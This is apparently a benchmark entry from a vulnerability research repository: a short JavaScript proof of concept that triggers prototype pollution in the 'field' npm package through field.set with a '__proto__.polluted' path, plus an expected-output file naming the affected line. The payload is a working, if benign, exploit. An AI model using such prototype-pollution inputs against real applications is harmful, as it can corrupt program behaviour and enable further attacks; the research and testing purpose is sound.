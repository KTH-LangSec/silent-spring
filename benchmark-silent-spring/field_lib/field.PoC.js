//https://snyk.io/vuln/SNYK-JS-FIELD-1039884
var field = require('field')
field.set({}, '__proto__.polluted', 'yes')
