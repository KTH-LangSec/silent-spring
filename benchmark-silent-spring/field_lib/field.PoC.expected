node_modules/field/lib/field.js:50:20